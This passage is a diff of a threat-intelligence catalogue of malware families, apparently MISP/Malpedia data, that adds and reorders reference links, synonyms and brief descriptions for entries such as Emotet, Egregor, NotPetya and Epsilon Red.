"https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", @@ -14280,6 +16474,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack", + "https://media.ccc.de/v/froscon2021-2670-der_cyber-bankraub_von_bangladesch", "https://content.fireeye.com/apt/rpt-apt38", "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", @@ -14298,15 +16493,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "http://www.secureworks.com/research/threat-profiles/gold-blackburn", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html", "https://www.secureworks.com/research/threat-profiles/gold-blackburn", - "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "https://www.secureworks.com/research/dyre-banking-trojan" ], "synonyms": [ "Dyreza" @@ -14349,25 +16548,34 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/", "https://www.intrinsec.com/egregor-prolock/", + "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/", "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", "https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/", - "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf", - "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware", "https://twitter.com/redcanary/status/1334224861628039169", + "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware", + "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf", "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", - "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/", "https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/", + "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/", "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html", + "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html", "https://www.group-ib.com/blog/egregor", "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", @@ -14375,20 +16583,29 @@ "https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/", "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", "https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/", + "https://securityintelligence.com/posts/egregor-ransomware-negotiations-uncovered/", "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/", + "https://therecord.media/frances-lead-cybercrime-investigator-on-the-egregor-arrests-cybercrime/", "https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor", "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf", - "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", "https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", "https://securelist.com/targeted-ransomware-encrypting-data/99255/", "https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/" + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/", + "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/", + "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/" ], "synonyms": [], "type": [] @@ -14463,6 +16680,7 @@ "https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", "https://documents.trendmicro.com/assets/threat-reports/rpt-1h-2014-targeted-attack-trends-in-asia-pacific.pdf" ], "synonyms": [ @@ -14523,7 +16741,7 @@ "value": "Emissary" }, { - "description": "While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.\r\nIt is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.", + "description": "While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.\r\nIt is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.\r\nEmotet has been taken down in January 2021.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet", @@ -14536,6 +16754,8 @@ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", "https://www.jpcert.or.jp/english/at/2019/at190044.html", "https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/", + "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers", + "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", "https://twitter.com/raashidbhatt/status/1237853549200936960", "https://www.us-cert.gov/ncas/alerts/TA18-201A", "https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf", @@ -14544,6 +16764,10 @@ "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", + "https://therecord.media/over-780000-email-accounts-compromised-by-emotet-have-been-secured/", + "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf", + "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return", + "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/", "https://www.secureworks.com/research/threat-profiles/gold-crestwood", "https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/", "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf", @@ -14553,6 +16777,7 @@ "https://www.digitalshadows.com/blog-and-research/emotet-disruption/", "https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/", "https://www.youtube.com/watch?v=_BLOmClsSpc", + "https://unit42.paloaltonetworks.com/c2-traffic/", "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol", "https://paste.cryptolaemus.com", "https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html", @@ -14566,26 +16791,29 @@ "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69", "https://www.lac.co.jp/lacwatch/people/20201106_002321.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", - "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://blog.talosintelligence.com/2020/11/emotet-2020.html", "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", "https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", "https://www.hornetsecurity.com/en/security-information/emotet-is-back/", "https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures", + "https://www.tagesschau.de/investigativ/br-recherche/emotet-schadsoftware-103.html", "https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728", "https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/", "https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b", - "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/", + "https://unit42.paloaltonetworks.com/emotet-command-and-control/", "https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/", "https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html", "https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage", "https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/", "https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1", "https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", "https://www.youtube.com/watch?v=8PHCZdpNKrw", "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", @@ -14595,13 +16823,14 @@ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/", "https://github.com/mauronz/binja-emotet", "https://www.cert.pl/en/news/single/whats-up-emotet/", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", "https://persianov.net/emotet-malware-analysis-part-1", "https://persianov.net/emotet-malware-analysis-part-2", "https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/", - "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", "https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/", "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", "https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/", @@ -14614,23 +16843,27 @@ "https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf", "https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/", "https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/", - "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage", + "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes", "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", + "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled", "https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html", "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", "https://www.youtube.com/watch?v=_mGMJFNJWSk", "https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/", + "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128", "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/", "http://ropgadget.com/posts/defensive_pcres.html", + "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/", "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", "https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html", "https://cert.grnet.gr/en/blog/reverse-engineering-emotet/", "https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/", "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", "https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break", - "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", "https://intel471.com/blog/emotet-takedown-2021/", @@ -14643,6 +16876,7 @@ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", "https://unit42.paloaltonetworks.com/domain-parking/", + "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action", "https://spamauditor.org/2020/10/the-many-faces-of-emotet/", "https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/", "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", @@ -14654,14 +16888,14 @@ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", "https://github.com/d00rt/emotet_research", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/", "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates", "https://isc.sans.edu/diary/rss/27036", "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service", - "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", "https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html", @@ -14671,6 +16905,7 @@ "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/", "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", "https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/", @@ -14681,6 +16916,7 @@ "https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf", "https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/", + "https://www.wiwo.de/my/technologie/digitale-welt/emotet-netzwerk-wie-eines-der-groessten-hacker-netzwerke-der-welt-lahmgelegt-wurde/27164048.html", "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", "https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/", "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", @@ -14700,18 +16936,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader", - "https://paper.seebug.org/1301/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", - "https://twitter.com/thor_scanner/status/992036762515050496", + "http://www.secureworks.com/research/threat-profiles/gold-burlap", + "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", + "https://paper.seebug.org/1301/", + "http://www.secureworks.com/research/threat-profiles/gold-heron", "https://www.secureworks.com/research/threat-profiles/bronze-firestone", - "https://www.secureworks.com/research/threat-profiles/gold-heron", + "https://twitter.com/thor_scanner/status/992036762515050496", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://redcanary.com/blog/getsystem-offsec/", "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", "https://www.secureworks.com/research/threat-profiles/gold-ulrick", + "https://www.secureworks.com/research/threat-profiles/gold-heron", "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-atlas" ], @@ -14767,6 +17006,23 @@ "uuid": "58071588-708d-447d-9fb4-8c9268142c82", "value": "Enviserv" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.epsilon_red", + "https://therecord.media/epsilonred-ransomware-group-hits-one-of-indias-financial-software-powerhouses/", + "https://news.sophos.com/en-us/2021/05/28/epsilonred/", + "https://cybleinc.com/2021/06/03/nucleus-software-becomes-victim-of-the-blackcocaine-ransomware/" + ], + "synonyms": [ + "BlackCocaine" + ], + "type": [] + }, + "uuid": "d6d0bf38-c85c-41d3-bc0e-3477b458563e", + "value": "Epsilon Red" + }, { "description": "", "meta": { @@ -14844,7 +17100,7 @@ "value": "Erica Ransomware" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eris", @@ -14854,13 +17110,14 @@ "type": [] }, "uuid": "c4531af6-ab25-4266-af41-e01635a93abe", - "value": "Eris Ransomware" + "value": "Eris" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternalrocks", + "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/", "https://github.com/stamparm/EternalRocks" ], "synonyms": [ @@ -14876,6 +17133,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", "https://securelist.com/from-blackenergy-to-expetr/78937/", "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html", @@ -14889,6 +17147,7 @@ "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", "https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html", + "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/", "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", @@ -14899,6 +17158,7 @@ "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/", + "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", @@ -14911,6 +17171,7 @@ "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", + "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", @@ -14994,6 +17255,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum", + "https://mp.weixin.qq.com/s/lryl3a65uIz1AwZcfuzp1A", "https://github.com/eset/malware-ioc/tree/master/evilnum", "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/" @@ -15037,11 +17299,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel", - "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", - "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", "https://www.wired.com/story/sandworm-centreon-russia-hack/", - "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", + "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf" ], "synonyms": [], "type": [] @@ -15071,6 +17334,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", "https://github.com/nccgroup/Royal_APT", + "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], @@ -15093,7 +17357,7 @@ "value": "Exile RAT" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exorcist", @@ -15103,7 +17367,7 @@ "type": [] }, "uuid": "d742986c-04f0-48ef-aaa3-10eeb0e95be4", - "value": "Exorcist Ransomware" + "value": "Exorcist" }, { "description": "", @@ -15268,6 +17532,7 @@ "description": "FastLoader is a small .NET downloader, which name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of processes and uploads it together with screenshot(s). In more recent versions, it employs simple anti-analysis checks (VM detection) and comes with string obfuscations. \r\n", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader", "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader" ], "synonyms": [], @@ -15293,6 +17558,19 @@ "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", "value": "FastPOS" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat", + 